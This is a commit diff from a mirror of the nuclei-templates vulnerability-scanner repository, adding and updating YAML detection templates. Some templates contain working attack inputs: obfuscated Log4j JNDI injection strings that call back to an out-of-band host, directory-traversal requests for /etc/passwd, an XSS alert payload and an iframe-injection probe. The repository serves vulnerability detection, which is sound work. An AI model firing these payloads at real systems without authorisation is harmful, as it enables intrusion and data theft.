daffainfo
/
nuclei-templates
mirror of https://github.com/daffainfo/nuclei-templates.git
1
0
Fork 0
Code Issues Packages Projects Releases Wiki Activity

Merge pull request #1 from projectdiscovery/master 

Updation
patch-1
Dhiyaneshwaran 2021-12-21 21:49:53 +05:30 committed by GitHub
parent fdeb2b8500 a511dac237
commit 34ca3272e9
No known key found for this signature in database
GPG Key ID: 4AEE18F83AFDEB23
42 changed files with 1926 additions and 1170 deletions
Show Stats Download Patch File Download Diff File Expand all files Collapse all files

2
.github/scripts/README.tmpl vendored
View File

@ -58,6 +58,8 @@ We have also added a set of templates to help you understand how things work.
Nuclei-templates is powered by major contributions from the community.
[Template contributions ](https://github.com/projectdiscovery/nuclei-templates/issues/new?assignees=&labels=&template=submit-template.md&title=%5Bnuclei-template%5D+), [Feature Requests](https://github.com/projectdiscovery/nuclei-templates/issues/new?assignees=&labels=&template=feature_request.md&title=%5BFeature%5D+) and [Bug Reports](https://github.com/projectdiscovery/nuclei-templates/issues/new?assignees=&labels=&template=bug_report.md&title=%5BBug%5D+) are more than welcome.
![Alt](https://repobeats.axiom.co/api/embed/55ee65543bb9a0f9c797626c4e66d472a517d17c.svg "Repobeats analytics image")
💬 Discussion
-----

2
.github/workflows/cve-annotate.yml vendored
View File

@ -25,7 +25,7 @@ jobs:
run: |
if ! which cve-annotate > /dev/null; then
echo -e "Command cve-annotate not found! Installing\c"
go install github.com/projectdiscovery/nuclei/v2/cmd/cve-annotate@latest
go install github.com/projectdiscovery/nuclei/v2/cmd/cve-annotate@dev
fi
cve-annotate -i ./cves/ -d .
echo "::set-output name=changes::$(git status -s | wc -l)"

24
README.md
View File

@ -42,18 +42,18 @@ An overview of the nuclei template project, including statistics on unique tags,
| TAG | COUNT | AUTHOR | COUNT | DIRECTORY | COUNT | SEVERITY | COUNT | TYPE | COUNT |
|-----------|-------|---------------|-------|------------------|-------|----------|-------|---------|-------|
| cve | 922 | daffainfo | 354 | cves | 928 | info | 921 | http | 2517 |
| lfi | 383 | dhiyaneshdk | 342 | vulnerabilities | 353 | high | 696 | file | 57 |
| panel | 324 | pikpikcu | 287 | exposed-panels | 324 | medium | 528 | network | 47 |
| xss | 290 | pdteam | 216 | technologies | 226 | critical | 326 | dns | 12 |
| wordpress | 271 | geeknik | 172 | exposures | 196 | low | 167 | | |
| exposure | 250 | dwisiswant0 | 158 | misconfiguration | 164 | | | | |
| tech | 233 | pussycat0x | 94 | token-spray | 133 | | | | |
| rce | 231 | gy741 | 91 | takeovers | 65 | | | | |
| cve2021 | 192 | 0x_akoko | 79 | default-logins | 63 | | | | |
| wp-plugin | 187 | princechaddha | 72 | file | 57 | | | | |
| cve | 928 | daffainfo | 359 | cves | 934 | info | 936 | http | 2546 |
| lfi | 389 | dhiyaneshdk | 342 | vulnerabilities | 362 | high | 705 | file | 57 |
| panel | 331 | pikpikcu | 287 | exposed-panels | 331 | medium | 531 | network | 47 |
| xss | 291 | pdteam | 221 | technologies | 227 | critical | 328 | dns | 12 |
| wordpress | 273 | geeknik | 173 | exposures | 196 | low | 169 | | |
| exposure | 251 | dwisiswant0 | 158 | misconfiguration | 165 | | | | |
| rce | 235 | pussycat0x | 94 | token-spray | 138 | | | | |
| tech | 234 | gy741 | 92 | takeovers | 65 | | | | |
| cve2021 | 198 | 0x_akoko | 82 | default-logins | 63 | | | | |
| wp-plugin | 188 | princechaddha | 76 | file | 57 | | | | |
**192 directories, 2705 files**.
**194 directories, 2742 files**.
</td>
</tr>
@ -71,6 +71,8 @@ We have also added a set of templates to help you understand how things work.
Nuclei-templates is powered by major contributions from the community.
[Template contributions ](https://github.com/projectdiscovery/nuclei-templates/issues/new?assignees=&labels=&template=submit-template.md&title=%5Bnuclei-template%5D+), [Feature Requests](https://github.com/projectdiscovery/nuclei-templates/issues/new?assignees=&labels=&template=feature_request.md&title=%5BFeature%5D+) and [Bug Reports](https://github.com/projectdiscovery/nuclei-templates/issues/new?assignees=&labels=&template=bug_report.md&title=%5BBug%5D+) are more than welcome.
![Alt](https://repobeats.axiom.co/api/embed/55ee65543bb9a0f9c797626c4e66d472a517d17c.svg "Repobeats analytics image")
💬 Discussion
-----

2
TEMPLATES-STATS.json
View File

File diff suppressed because one or more lines are too long

2187
TEMPLATES-STATS.md
View File

File diff suppressed because it is too large Load Diff

20
TOP-10.md
View File

@ -1,12 +1,12 @@
| TAG | COUNT | AUTHOR | COUNT | DIRECTORY | COUNT | SEVERITY | COUNT | TYPE | COUNT |
|-----------|-------|---------------|-------|------------------|-------|----------|-------|---------|-------|
| cve | 922 | daffainfo | 354 | cves | 928 | info | 921 | http | 2517 |
| lfi | 383 | dhiyaneshdk | 342 | vulnerabilities | 353 | high | 696 | file | 57 |
| panel | 324 | pikpikcu | 287 | exposed-panels | 324 | medium | 528 | network | 47 |
| xss | 290 | pdteam | 216 | technologies | 226 | critical | 326 | dns | 12 |
| wordpress | 271 | geeknik | 172 | exposures | 196 | low | 167 | | |
| exposure | 250 | dwisiswant0 | 158 | misconfiguration | 164 | | | | |
| tech | 233 | pussycat0x | 94 | token-spray | 133 | | | | |
| rce | 231 | gy741 | 91 | takeovers | 65 | | | | |
| cve2021 | 192 | 0x_akoko | 79 | default-logins | 63 | | | | |
| wp-plugin | 187 | princechaddha | 72 | file | 57 | | | | |
| cve | 928 | daffainfo | 359 | cves | 934 | info | 936 | http | 2546 |
| lfi | 389 | dhiyaneshdk | 342 | vulnerabilities | 362 | high | 705 | file | 57 |
| panel | 331 | pikpikcu | 287 | exposed-panels | 331 | medium | 531 | network | 47 |
| xss | 291 | pdteam | 221 | technologies | 227 | critical | 328 | dns | 12 |
| wordpress | 273 | geeknik | 173 | exposures | 196 | low | 169 | | |
| exposure | 251 | dwisiswant0 | 158 | misconfiguration | 165 | | | | |
| rce | 235 | pussycat0x | 94 | token-spray | 138 | | | | |
| tech | 234 | gy741 | 92 | takeovers | 65 | | | | |
| cve2021 | 198 | 0x_akoko | 82 | default-logins | 63 | | | | |
| wp-plugin | 188 | princechaddha | 76 | file | 57 | | | | |

30
cves/2015/CVE-2015-0554.yaml Normal file
View File

@ -0,0 +1,30 @@
id: CVE-2015-0554
info:
name: Pirelli ADSL2/2+ Wireless Router P.DGA4001N - Information Disclosure
author: daffainfo
severity: high
description: The ADB (formerly Pirelli Broadband Solutions) P.DGA4001N router with firmware PDG_TEF_SP_4.06L.6 does not properly restrict access to the web interface, which allows remote attackers to obtain sensitive information or cause a denial of service (device restart) as demonstrated by a direct request to (1) wlsecurity.html or (2) resetrouter.html.
reference:
- https://www.exploit-db.com/exploits/35721
- https://nvd.nist.gov/vuln/detail/CVE-2015-0554
tags: cve,cve2015,pirelli,router,disclosure
requests:
- method: GET
path:
- "{{BaseURL}}/wlsecurity.html"
matchers-condition: and
matchers:
- type: word
part: body
words:
- "var wpapskkey"
- "var WscDevPin"
- "var sessionkey"
condition: and
- type: status
status:
- 200

27
cves/2015/CVE-2015-2166.yaml Normal file
View File

@ -0,0 +1,27 @@
id: CVE-2015-2166
info:
name: Ericsson Drutt MSDP (Instance Monitor) Directory Traversal
author: daffainfo
severity: high
description: Directory traversal vulnerability in the Instance Monitor in Ericsson Drutt Mobile Service Delivery Platform (MSDP) 4, 5, and 6 allows remote attackers to read arbitrary files via a ..%2f (dot dot encoded slash) in the default URI.
reference:
- https://www.exploit-db.com/exploits/36619
- https://nvd.nist.gov/vuln/detail/CVE-2015-2166
tags: cve,cve2015,lfi,ericsson
requests:
- method: GET
path:
- "{{BaseURL}}/..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2fetc/passwd"
matchers-condition: and
matchers:
- type: regex
part: body
regex:
- "root:.*:0:0"
- type: status
status:
- 200

7
cves/2016/CVE-2016-6210.yaml
View File

@ -19,14 +19,15 @@ info:
network:
- host:
- "{{Host}}:22"
- "{{Hostname}}"
- "{{Hostname}}:22"
matchers:
- type: regex
regex:
- '(?i)SSH-2.0-OpenSSH_(?:[1-6][^\d][^\r]+|7\.[0-2][^\d][^\r]+)'
- '(?i)SSH-2.0-OpenSSH_(?:[1-6][^\d][^\r\n]+|7\.[0-2][^\d][\n^\r]+)'
extractors:
- type: regex
regex:
- '(?i)SSH-2.0-OpenSSH_[^\r]+'
- '(?i)SSH-2.0-OpenSSH_[^\r\n]+'

32
cves/2018/CVE-2018-15138.yaml Normal file
View File

@ -0,0 +1,32 @@
id: CVE-2018-15138
info:
name: LG-Ericsson iPECS NMS 30M Directory Traversal
author: 0x_Akoko
severity: high
description: Ericsson-LG iPECS NMS 30M allows directory traversal via ipecs-cm/download?filename=../ URIs.
reference:
- https://cxsecurity.com/issue/WLB-2018080070
- https://nvd.nist.gov/vuln/detail/CVE-2018-15138
classification:
cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N
cvss-score: 7.5
cve-id: CVE-2018-15138
cwe-id: CWE-22
tags: cve,cve2018,ericsson,lfi
requests:
- method: GET
path:
- "{{BaseURL}}/ipecs-cm/download?filename=../../../../../../../../../../etc/passwd&filepath=/home/wms/www/data"
- "{{BaseURL}}/ipecs-cm/download?filename=jre-6u13-windows-i586-p.exe&filepath=../../../../../../../../../../etc/passwd%00.jpg"
stop-at-first-match: true
matchers-condition: and
matchers:
- type: regex
regex:
- "root:[x*]:0:0"
- type: status
status:
- 200

33
cves/2021/CVE-2021-26085.yaml Normal file
View File

@ -0,0 +1,33 @@
id: CVE-2021-26085
info:
name: Confluence Pre-Authorization Arbitrary File Read in /s/ endpoint - CVE-2021-26085
author: princechaddha
severity: medium
description: Affected versions of Atlassian Confluence Server allow remote attackers to view restricted resources via a Pre-Authorization Arbitrary File Read vulnerability in the /s/ endpoint.
reference:
- https://packetstormsecurity.com/files/164401/Atlassian-Confluence-Server-7.5.1-Arbitrary-File-Read.html
- https://nvd.nist.gov/vuln/detail/CVE-2021-26085
tags: cve,cve2021,confluence,atlassian,lfi
classification:
cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:N/A:N
cvss-score: 5.30
cve-id: CVE-2021-26085
cwe-id: CWE-862
requests:
- method: GET
path:
- "{{BaseURL}}/s/123cfx/_/;/WEB-INF/web.xml"
matchers-condition: and
matchers:
- type: status
status:
- 200
- type: word
part: body
words:
- "<display-name>Confluence</display-name>"
- "com.atlassian.confluence.setup.ConfluenceAppConfig"
condition: and

7
cves/2021/CVE-2021-40856.yaml
View File

@ -3,12 +3,17 @@ id: CVE-2021-40856
info:
name: Auerswald COMfortel 1400/2600/3600 IP - Authentication Bypass
author: gy741
severity: medium
severity: high
description: Inserting the prefix "/about/../" allows bypassing the authentication check for the web-based configuration management interface. This enables attackers to gain access to the login credentials used for authentication at the PBX, among other data.
reference:
- https://www.redteam-pentesting.de/en/advisories/rt-sa-2021-004/-auerswald-comfortel-1400-2600-3600-ip-authentication-bypass
- https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-40856
tags: cve,cve2021,comfortel,auth-bypass
classification:
cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N
cvss-score: 7.50
cve-id: CVE-2021-40856
cwe-id: CWE-287
requests:
- raw:

39
cves/2021/CVE-2021-44228.yaml
View File

@ -2,7 +2,7 @@ id: CVE-2021-44228
info:
name: Remote code injection in Log4j
author: melbadry9,dhiyaneshDK,daffainfo
author: melbadry9,dhiyaneshDK,daffainfo,anon-artist,0xceba,Tea
severity: critical
description: Apache Log4j2 <=2.14.1 JNDI features used in configuration, log messages, and parameters do not protect against attacker controlled LDAP and other JNDI related endpoints. An attacker who can control log messages or log message parameters can execute arbitrary code loaded from LDAP servers when message lookup substitution is enabled.
reference:
@ -10,16 +10,35 @@ info:
- https://www.lunasec.io/docs/blog/log4j-zero-day/
- https://gist.github.com/bugbountynights/dde69038573db1c12705edb39f9a704a
tags: cve,cve2021,rce,oast,log4j
classification:
cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H
cvss-score: 10.00
cve-id: CVE-2021-44228
cwe-id: CWE-502
requests:
- raw:
- |
GET /?x=${jndi:ldap://${hostName}.{{interactsh-url}}/a} HTTP/1.1
Host: {{Hostname}}
User-Agent: ${${::-j}${::-n}${::-d}${::-i}:${::-l}${::-d}${::-a}${::-p}://${hostName}.{{interactsh-url}}}
Referer: ${jndi:${lower:l}${lower:d}${lower:a}${lower:p}://${hostName}.{{interactsh-url}}}
X-Forwarded-For: ${jndi:${lower:l}${lower:d}${lower:a}${lower:p}://${hostName}.{{interactsh-url}}}
Authentication: ${jndi:${lower:l}${lower:d}${lower:a}${lower:p}://${hostName}.{{interactsh-url}}}
Accept: ${jndi:ldap://${hostName}.accept.{{interactsh-url}}}
Accept-Encoding: ${jndi:ldap://${hostName}.acceptencoding.{{interactsh-url}}}
Accept-Language: ${jndi:ldap://${hostName}.acceptlanguage.{{interactsh-url}}}
Access-Control-Request-Headers: ${jndi:ldap://${hostName}.accesscontrolrequestheaders.{{interactsh-url}}}
Access-Control-Request-Method: ${jndi:ldap://${hostName}.accesscontrolrequestmethod.{{interactsh-url}}}
Authentication: Basic ${jndi:ldap://${hostName}.authenticationbasic.{{interactsh-url}}}
Authentication: Bearer ${jndi:ldap://${hostName}.authenticationbearer.{{interactsh-url}}}
Cookie: ${jndi:ldap://${hostName}.cookiename.{{interactsh-url}}}=${jndi:ldap://${hostName}.cookievalue.{{interactsh-url}}}
Location: ${jndi:ldap://${hostName}.location.{{interactsh-url}}}
Origin: ${jndi:ldap://${hostName}.origin.{{interactsh-url}}}
Referer: ${jndi:ldap://${hostName}.referer.{{interactsh-url}}}
Upgrade-Insecure-Requests: ${jndi:ldap://${hostName}.upgradeinsecurerequests.{{interactsh-url}}}
User-Agent: ${jndi:ldap://${hostName}.useragent.{{interactsh-url}}}
X-Api-Version: ${jndi:ldap://${hostName}.xapiversion.{{interactsh-url}}}
X-CSRF-Token: ${jndi:ldap://${hostName}.xcsrftoken.{{interactsh-url}}}
X-Druid-Comment: ${jndi:ldap://${hostName}.xdruidcomment.{{interactsh-url}}}
X-Forwarded-For: ${jndi:ldap://${hostName}.xforwardedfor.{{interactsh-url}}}
X-Origin: ${jndi:ldap://${hostName}.xorigin.{{interactsh-url}}}
matchers-condition: and
matchers:
@ -31,11 +50,17 @@ requests:
- type: regex
part: interactsh_request
regex:
- '([a-z0-9\.\-]+)\.([a-z0-9]+)\.([a-z0-9]+)\.\w+' # Match for extracted ${hostName} variable
- '([a-zA-Z0-9\.\-]+)\.([a-z0-9]+)\.([a-z0-9]+)\.([a-z0-9]+)\.\w+' # Print extracted ${hostName} in output
extractors:
- type: regex
part: interactsh_request
group: 2
regex:
- '([a-zA-Z0-9\.\-]+)\.([a-z0-9]+)\.([a-z0-9]+)\.([a-z0-9]+)\.\w+' # Print injection point in output
- type: regex
part: interactsh_request
group: 1
regex:
- '([a-z0-9\.\-]+)\.([a-z0-9]+)\.([a-z0-9]+)\.\w+' # Print extracted ${hostName} in output
- '([a-zA-Z0-9\.\-]+)\.([a-z0-9]+)\.([a-z0-9]+)\.([a-z0-9]+)\.\w+' # Print extracted ${hostName} in output

36
cves/2021/CVE-2021-44848.yaml Normal file
View File

@ -0,0 +1,36 @@
id: CVE-2021-44848
info:
name: Thinfinity VirtualUI User Enumeration
author: danielmofer
severity: medium
description: Thinfinity VirtualUI (before v3.0), /changePassword returns different responses for requests depending on whether the username exists. It may enumerate OS users (Administrator, Guest, etc.)
reference:
- https://github.com/cybelesoft/virtualui/issues/1
- https://nvd.nist.gov/vuln/detail/CVE-2021-44848
- https://www.tenable.com/cve/CVE-2021-44848
tags: cve,cve2021,exposure,thinfinity
classification:
cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:N/A:N
cvss-score: 5.30
cve-id: CVE-2021-44848
cwe-id: CWE-287
requests:
- raw:
- |
GET /changePassword?username=administrator HTTP/1.1
Host: {{Hostname}}
matchers-condition: and
matchers:
- type: regex
part: body
regex:
- '"rc":(.*?)'
- '"msg":"(.*?)"'
condition: and
- type: status
status:
- 200

5
cves/2021/CVE-2021-45043.yaml
View File

@ -13,6 +13,11 @@ info:
metadata:
google-dork: intitle:"HD-Network Real-time Monitoring System V2.0"
tags: cve,cve2021,hdnetwork,lfi,iot,camera
classification:
cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N
cvss-score: 7.50
cve-id: CVE-2021-45043
cwe-id: CWE-22
requests:
- raw:

29
cves/2021/CVE-2021-45092.yaml Normal file
View File

@ -0,0 +1,29 @@
id: CVE-2021-45092
info:
name: Thinfinity Iframe Injection
author: danielmofer
severity: critical
description: Thinfinity VirtualUI is a web remote desktop system, a vulnerability exist in a function located in /lab.html reachable by default that could allow IFRAME injection via the "vpath" parameter.
reference:
- https://github.com/cybelesoft/virtualui/issues/2
- https://nvd.nist.gov/vuln/detail/CVE-2021-44848
- https://www.tenable.com/cve/CVE-2021-45092
tags: cve,cve2021,injection,iframe,thinfinity
classification:
cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
cvss-score: 9.80
cve-id: CVE-2021-45092
cwe-id: CWE-74
requests:
- method: GET
path:
- "{{BaseURL}}/lab.html?vpath=//example.com"
matchers:
- type: regex
regex:
- ".*vpath.*"
- "thinfinity"
condition: and

1
default-logins/zabbix/zabbix-default-login.yaml
View File

@ -26,6 +26,7 @@ requests:
matchers-condition: and
matchers:
- type: word
part: header
words:
- "zabbix.php?action=dashboard.view"

25
exposed-panels/craftcms-admin-panel.yaml Normal file
View File

@ -0,0 +1,25 @@
id: craftcms-admin-panel
info:
name: Craft CMS admin panel
author: Supras
severity: info
metadata:
shodan-query: "X-Powered-By: Craft CMS"
tags: panel,craftcms
requests:
- method: GET
path:
- '{{BaseURL}}/admin/login'
matchers-condition: and
matchers:
- type: word
part: body
words:
- 'title="Powered by Craft CMS"'
- type: status
status:
- 200

25
exposed-panels/emerson-power-panel.yaml Normal file
View File

@ -0,0 +1,25 @@
id: emerson-power-panel
info:
name: Emerson Network Power IntelliSlot Web Card Panel
author: princechaddha
severity: info
metadata:
shodan-dork: 'http.title:"Emerson Network Power IntelliSlot Web Card"'
tags: panel,intellislot,emerson
requests:
- method: GET
path:
- "{{BaseURL}}"
matchers-condition: and
matchers:
- type: word
part: body
words:
- "<title>Emerson Network Power IntelliSlot Web Card</title>"
- type: status
status:
- 200

24
exposed-panels/emessage-panel.yaml Normal file
View File

@ -0,0 +1,24 @@
id: emessage-panel
info:
name: Emessage Panel Detect
author: ffffffff0x
severity: info
metadata:
fofa-query: title="emessage"
tags: panel,emessage
requests:
- method: GET
path:
- "{{BaseURL}}/login.jsp"
matchers-condition: and
matchers:
- type: regex
regex:
- '(?i)<title>emessage.*</title>'
- type: status
status:
- 200

25
exposed-panels/thinfinity-virtualui-panel.yaml Normal file
View File

@ -0,0 +1,25 @@
id: thinfinity-virtualui-panel
info:
name: Thinfinity VirtualUI Panel Detect
author: princechaddha
severity: info
metadata:
shodan-query: 'http.title:"Thinfinity VirtualUI"'
tags: panel,thinfinity,virtualui
requests:
- method: GET
path:
- "{{BaseURL}}"
matchers-condition: and
matchers:
- type: word
part: body
words:
- "<title>Thinfinity VirtualUI</title>"
- type: status
status:
- 200

34
misconfiguration/springboot/springboot-gateway.yaml Normal file
View File

@ -0,0 +1,34 @@
id: springboot-gateway
info:
name: Detect Spring Gateway Actuator
author: wdahlenb
severity: medium
description: Sensitive environment variables may not be masked
tags: springboot,exposure
reference: https://wya.pl/2021/12/20/bring-your-own-ssrf-the-gateway-actuator/
requests:
- method: GET
path:
- "{{BaseURL}}/gateway/routes"
- "{{BaseURL}}/actuator/gateway/routes"
stop-at-first-match: true
matchers-condition: and
matchers:
- type: word
part: body
words:
- "predicate"
- "route_id"
condition: and
- type: word
part: header
words:
- "application/json"
- type: status
status:
- 200

30
network/cowrie-honeypot-detect.yaml Normal file
View File

@ -0,0 +1,30 @@
id: cowrie-honeypot-detect
info:
name: Cowrie SSH Honeypot Detect
author: thesubtlety
severity: info
reference:
- https://web.archive.org/web/20170826075224/https://morris.sc/detecting-kippo-ssh-honeypots/
- https://github.com/blazeinfosec/detect-kippo-cowrie/blob/master/detectKippoCowrie.py
- https://github.com/rapid7/metasploit-framework/blob/master/modules/auxiliary/scanner/ssh/detect_kippo.rb
tags: network,ssh,honeypot
network:
- host:
- '{{Hostname}}'
- '{{Host}}:22'
inputs:
- data: "\n"
matchers-condition: and
matchers:
- type: regex
part: body
regex:
- 'SSH\-([0-9.-A-Za-z_ ]+)'
- type: word
words:
- Invalid SSH identification string

20
technologies/fingerprinthub-web-fingerprints.yaml
View File

@ -13521,11 +13521,6 @@ requests:
words:
- errmag
- type: word
name: w3-total-cache
words:
- "<!-- performance optimized by w3 total cache. learn more: http://www.w3-edge.com/wordpress-plugins/"
- type: word
name: w7-officialaccounts
words:
@ -14107,21 +14102,6 @@ requests:
words:
- wishoa_webplugin.js
- type: word
name: wordpress
words:
- /wp-content/themes/
- type: word
name: wordpress
words:
- 'name="generator" content="wordpress '
- type: word
name: wordpress
words:
- /wp-includes/
- type: word
name: wosign-ssl-cert
words:

36
technologies/tableau-server-detect.yaml Normal file
View File

@ -0,0 +1,36 @@
id: tableau-server-detect
info:
name: Detect Tableau Server
author: TechbrunchFR
description: Detects Tableau Server and extract the buildId
severity: info
tags: tech,tableau
requests:
- method: GET
path:
- "{{BaseURL}}"
matchers-condition: or
matchers:
- type: word
part: header
words:
- "X-Tableau: Tableau Server"
- "Server: Tableau"
condition: or
- type: word
part: body
words:
- "VizPortalRun"
- "vizportal"
condition: or
extractors:
- type: regex
part: body
group: 1
regex:
- 'data-buildId="([0-9a-z_]*)'

22
technologies/tech-detect.yaml
View File

@ -401,13 +401,6 @@ requests:
condition: or
part: body
- type: regex
name: wordpress-super-cache
regex:
- <!--[^>]+WP-Super-Cache
condition: or
part: body
- type: regex
name: comandia
regex:
@ -1087,14 +1080,6 @@ requests:
condition: or
part: body
- type: regex
name: wordpress
regex:
- <link rel=["']stylesheet["'] [^>]+/wp-(?:content|includes)/
- <link[^>]+s\d+\.wp\.com
condition: or
part: body
- type: regex
name: pygments
regex:
@ -2247,13 +2232,6 @@ requests:
condition: or
part: body
- type: regex
name: yoast-seo
regex:
- <!-- This site is optimized with the Yoast (?:WordPress )?SEO plugin v([\d.]+) -
condition: or
part: body
- type: regex
name: milligram
regex:

40
technologies/wordpress-detect.yaml Normal file
View File

@ -0,0 +1,40 @@
id: wordpress-detect
info:
name: WordPress Detection
author: pdteam
severity: info
tags: tech,wordpress
metadata:
shodan-query: http.component:"WordPress"
requests:
- method: GET
path:
- "{{RootURL}}"
redirects: true
max-redirects: 2
matchers-condition: or
matchers:
- type: regex
regex:
- '<link[^>]+s\d+\.wp\.com'
- '<!-- This site is optimized with the Yoast (?:WordPress )?SEO plugin v([\d.]+) -'
- '<!--[^>]+WP-Super-Cache'
condition: or
- type: word
words:
- '/wp-content/themes/'
- '/wp-includes/'
- 'name="generator" content="wordpress'
- '<!-- performance optimized by w3 total cache. learn more: http://www.w3-edge.com/wordpress-plugins/'
condition: or
extractors:
- type: regex
group: 1
regex:
- 'content="WordPress ([0-9.]+)"'

4
technologies/wordpress-gotmls-detect.yaml
View File

@ -15,9 +15,9 @@ requests:
matchers-condition: and
matchers:
- type: word
part: header
words:
- "gotmls"
part: header
- type: status
status:
@ -27,4 +27,4 @@ requests:
- type: kval
part: header
kval:
- Location
- location

27
token-spray/api-bitrise.yaml Normal file
View File

@ -0,0 +1,27 @@
id: api-bitrise
info:
name: Bitrise API Test
author: daffainfo
severity: info
reference:
- https://api-docs.bitrise.io/
- https://github.com/daffainfo/all-about-apikey/blob/main/Continous%20Integration/Bitrise.md
tags: token-spray,bitrise
self-contained: true
requests:
- raw:
- |
GET https://api.bitrise.io/v0.1/me HTTP/1.1
Host: api.bitrise.io
Authorization: {{token}}
matchers:
- type: word
part: body
words:
- '"username":'
- '"slug":'
- '"email":'
condition: and

26
token-spray/api-web3storage.yaml Normal file
View File

@ -0,0 +1,26 @@
id: api-web3storage
info:
name: Web3 Storage API Test
author: daffainfo
severity: info
reference:
- https://docs.web3.storage/
- https://github.com/daffainfo/all-about-apikey/blob/main/Cloud%20Storage%20-%20File%20Sharing/Web3%20Storage.md
tags: token-spray,web3storage
self-contained: true
requests:
- raw:
- |
GET https://api.web3.storage/user/uploads HTTP/1.1
Host: api.web3.storage
Authorization: Bearer {{token}}
matchers:
- type: word
part: body
words:
- '"created"'
- '"cid"'
condition: and

33
vulnerabilities/apache/apache-ofbiz-log4j-rce.yaml Normal file
View File

@ -0,0 +1,33 @@
id: apache-ofbiz-log4j-rce
info:
name: Apache OFBiz Log4j JNDI RCE
author: pdteam
severity: critical
tags: ofbiz,oast,log4j,rce,apache
requests:
- raw:
- |
GET /webtools/control/main HTTP/1.1
Host: {{Hostname}}
Cookie: OFBiz.Visitor=${jndi:ldap://${hostName}.{{interactsh-url}}}
matchers-condition: and
matchers:
- type: word
part: interactsh_protocol # Confirms the DNS Interaction
words:
- "dns"
- type: regex
part: interactsh_request
regex:
- '([a-zA-Z0-9\.\-]+)\.([a-z0-9]+)\.([a-z0-9]+)\.\w+' # Match for extracted ${hostName} variable
extractors:
- type: regex
part: interactsh_request
group: 1
regex:
- '([a-zA-Z0-9\.\-]+)\.([a-z0-9]+)\.([a-z0-9]+)\.\w+' # Print extracted ${hostName} in output

4
vulnerabilities/apache/apache-solr-log4j-rce.yaml
View File

@ -26,11 +26,11 @@ requests:
- type: regex
part: interactsh_request
regex:
- '([a-z0-9\.\-]+)\.([a-z0-9]+)\.([a-z0-9]+)\.\w+' # Match for extracted ${hostName} variable
- '([a-zA-Z0-9\.\-]+)\.([a-z0-9]+)\.([a-z0-9]+)\.\w+' # Match for extracted ${hostName} variable
extractors:
- type: regex
part: interactsh_request
group: 1
regex:
- '([a-z0-9\.\-]+)\.([a-z0-9]+)\.([a-z0-9]+)\.\w+' # Print extracted ${hostName} in output
- '([a-zA-Z0-9\.\-]+)\.([a-z0-9]+)\.([a-z0-9]+)\.\w+' # Print extracted ${hostName} in output

41
vulnerabilities/mobileiron/mobileiron-log4j-jndi-rce.yaml Normal file
View File

@ -0,0 +1,41 @@
id: mobileiron-log4j-jndi-rce
info:
name: MobileIron Log4J JNDI RCE
author: meme-lord
severity: high
description: Apache Log4j2 <=2.14.1 JNDI features used in configuration, log messages, and parameters do not protect against attacker controlled LDAP and other JNDI related endpoints. An attacker who can control log messages or log message parameters can execute arbitrary code loaded from LDAP servers when message lookup substitution is enabled.
reference:
- https://github.com/advisories/GHSA-jfh8-c2jp-5v3q
- https://www.lunasec.io/docs/blog/log4j-zero-day/
- https://gist.github.com/bugbountynights/dde69038573db1c12705edb39f9a704a
- https://github.com/rwincey/CVE-2021-44228-Log4j-Payloads/blob/main/MobileIron
tags: rce,jndi,oast,log4j,mobileiron
requests:
- raw:
- |
POST /mifs/j_spring_security_check HTTP/1.1
Referer: {{RootURL}}/mifs/user/login.jsp
Content-Type: application/x-www-form-urlencoded
j_username=${j${k8s:k5:-ND}i${sd:k5:-:}${lower:l}d${lower:a}${lower:p}://${hostName}.{{interactsh-url}}}&j_password=password&logincontext=employee
matchers-condition: and
matchers:
- type: word
part: interactsh_protocol # Confirms the DNS Interaction
words:
- "dns"
- type: regex
part: interactsh_request
regex:
- '([a-zA-Z0-9\.\-]+)\.([a-z0-9]+)\.([a-z0-9]+)\.\w+' # Match for extracted ${hostName} variable
extractors:
- type: regex
part: interactsh_request
group: 1
regex:
- '([a-zA-Z0-9\.\-]+)\.([a-z0-9]+)\.([a-z0-9]+)\.\w+' # Print extracted ${hostName} in output

25
vulnerabilities/other/asanhamayesh-lfi.yaml Normal file
View File

@ -0,0 +1,25 @@
id: asanhamayesh-lfi
info:
name: Asanhamayesh CMS 3.4.6 Directory traversal Vulnerability
author: 0x_Akoko
severity: high
reference:
- https://cxsecurity.com/issue/WLB-2018030006
- https://asanhamayesh.com
tags: asanhamayesh,lfi
requests:
- method: GET
path:
- "{{BaseURL}}/downloadfile.php?file=../../../../../../../../../../etc/passwd"
matchers-condition: and
matchers:
- type: regex
regex:
- "root:[x*]:0:0"
- type: status
status:
- 200

25
vulnerabilities/other/global-domains-lfi.yaml Normal file
View File

@ -0,0 +1,25 @@
id: global-domains-lfi
info:
name: Global Domains International Directory traversal Vulnerability
author: 0x_Akoko
severity: high
reference:
- https://cxsecurity.com/issue/WLB-2018020247
- http://www.nic.ws
tags: globaldomains,lfi
requests:
- method: GET
path:
- "{{BaseURL}}/kvmlm2/index.dhtml?fname=&language=../../../../../../../../../../etc/passwd%00.jpg&lname=&sponsor=gdi&template=11"
matchers-condition: and
matchers:
- type: regex
regex:
- "root:[x*]:0:0"
- type: status
status:
- 200

29
vulnerabilities/other/global-domains-xss.yaml Normal file
View File

@ -0,0 +1,29 @@
id: global-domains-xss
info:
name: Global Domains International XSS
author: princechaddha
severity: medium
reference: https://cxsecurity.com/issue/WLB-2018020247
tags: globaldomains,xss
requests:
- method: GET
path:
- "{{BaseURL}}/index.dhtml?sponsor=%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E"
matchers-condition: and
matchers:
- type: word
part: body
words:
- "</script><script>alert(document.domain)</script>"
- type: word
part: header
words:
- text/html
- type: status
status:
- 200

26
vulnerabilities/other/groupoffice-lfi.yaml Normal file
View File

@ -0,0 +1,26 @@
id: groupoffice-lfi
info:
name: Groupoffice 3.4.21 Directory Traversal Vulnerability
author: 0x_Akoko
severity: high
